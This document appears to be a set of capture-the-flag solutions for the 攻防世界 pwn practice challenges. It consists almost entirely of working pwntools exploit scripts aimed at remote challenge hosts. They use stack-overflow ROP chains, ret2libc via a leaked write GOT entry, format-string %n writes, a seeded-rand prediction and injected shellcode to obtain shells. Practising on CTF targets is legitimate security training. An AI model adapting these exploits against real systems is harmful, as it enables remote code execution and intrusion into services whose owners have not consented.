攻防世界
一、level0
思路1
# level0, approach 1: stack-overflow script against the challenge host below.
# The return address is replaced with a single hard-coded address; the variable
# name suggests an existing system() call site in the binary (not verifiable here).
from pwn import *
context.log_level='debug'  # prints every byte sent/received, handy when the recvuntil() markers misalign
r=remote('220.249.52.133',30689)  # challenge host/port as given on the page
system_call=0x400596  # fixed address: presumably the binary is not position-independent — confirm with checksec
# 0x80 bytes of filler, 8 bytes (likely the saved rbp), then the new return address.
# NOTE: str + bytes concatenation — this relies on Python 2 / legacy pwntools semantics.
payload='A'*0x80+'B'*0x8+p64(system_call)
r.recvuntil('\n')  # wait for the program's first line before sending
r.sendline(payload)
r.interactive()
思路2
# level0, approach 2: same overflow, but a three-entry ROP chain instead of a
# single return target: gadget, argument, call. Names are the author's; the
# addresses cannot be checked from this page.
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',45991)
pop_rdi=0x400663  # presumably a `pop rdi; ret` gadget (amd64 first argument register)
system=0x400460   # presumably the system() PLT/IAT entry
binsh=0x400684    # presumably a "/bin/sh" string inside the binary
# 0x80 filler + 8 bytes (likely saved rbp) + chain: pop_rdi -> binsh -> system.
# NOTE: str + bytes concatenation — Python 2 / legacy pwntools semantics.
payload='a'*0x80+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()
二、level2
from pwn import *
r=remote('220.249.52.133',38928)
sys_addr=0x08048320
binsh_addr=0x0804A024
payload='A'*0x88+'B'*0x4+p32(sys_addr)+'bbbb'+p32(binsh_addr)
r.recvuntil(':')
r.sendline(payload)
r.interactive()
三、level3
写法1
from pwn import *
from LibcSearcher import *
context.log_level='debug'
r=remote('220.249.52.133',32619)
elf=ELF('./level3')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
libc=LibcSearcher('write',write_addr)
base_addr=write_addr-libc.dump('write')
sys_addr=base_addr+libc.dump('system')
binsh=base_addr+libc.dump('str_bin_sh')
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()
写法2
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',58376)
elf=ELF('./level3')
libc=ELF('./libc32.so.6')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
payload1='a'*0x88+'bbbb'+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('\n')
r.sendline(payload1)
write_addr=u32(r.recv()[:4])
base_addr=write_addr-libc.sym['write']
sys_addr=base_addr+libc.sym['system']
binsh=base_addr+libc.search('/bin/sh').next()
payload2='A'*0x88+'bbbb'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('\n')
r.sendline(payload2)
r.interactive()
四、when_did_you_born
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',44288)
r.recvuntil('lets get helloworld for bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()
五、hello_pwn
from pwn import *
context.log_level='debug'
r=remote('220.249.52.133',40669)
r.recvuntil('bof')
payload='A'*0x4+p64(1853186401)
r.sendline(payload)
r.interactive()
六、guess_num
from pwn import *
from ctypes import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
r=remote('220.249.52.133',37416)
payload='a'*0x20+p64(0)
r.recvuntil('name:')
r.sendline(payload)
libc=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0)
for i in range(10):
r.recvuntil('number:')
r.sendline(str(libc.rand()%6+1))
r.recvuntil('Success')
r.recvuntil('flag!')
r.interactive()
七、CGfsb
from pwn import *
context.log_level='debug'
io=remote("111.198.29.45","49496")
payload=p32(0x0804A068)+"aaaa"+"%10$n"
io.sendlineafter("please tell me your name:","aaa")
io.sendlineafter("leave your message please",payload)
io.interactive()
八、getshell
远程运行获取flag
九、int_overflow
from pwn import *
io = remote("111.198.29.45", 47271)
cat_flag_addr = 0x0804868B
io.sendlineafter("Your choice:", "1")
io.sendlineafter("your username:", "Sakura")
io.recvuntil("your passwd:")
payload = "a" * 0x14 + "aaaa" + p32(cat_flag_addr)+"a"*234
io.sendline(payload)
io.recv()
io.interactive()
十、cgpwn2
from pwn import *
r=remote('111.198.29.45',46997)
sys_addr=0x08048420
binsh=0x0804A080
payload=0x2A*'a'+p32(sys_addr)+p32(0)+p32(binsh)
r.recvuntil('please tell me your name\n')
r.sendline('Sakura')
r.recvuntil('hello,you can leave some message here:\n')
r.sendline(payload)
r.interactive()
十一、string
from pwn import *
p = remote("111.198.29.45","49404")
context.log_level='debug'
p.recvuntil('secret[0] is')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
p.sendlineafter("What should your character's name be:", 'Sakura')
p.sendlineafter("east or up?:", 'east')
p.sendlineafter("(0)?:", '1')
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
p.sendlineafter("And, you wish is:", '%85c%7$n')
shellcode = asm(shellcraft.sh())
p.sendlineafter("SPELL", shellcode)
p.interactive()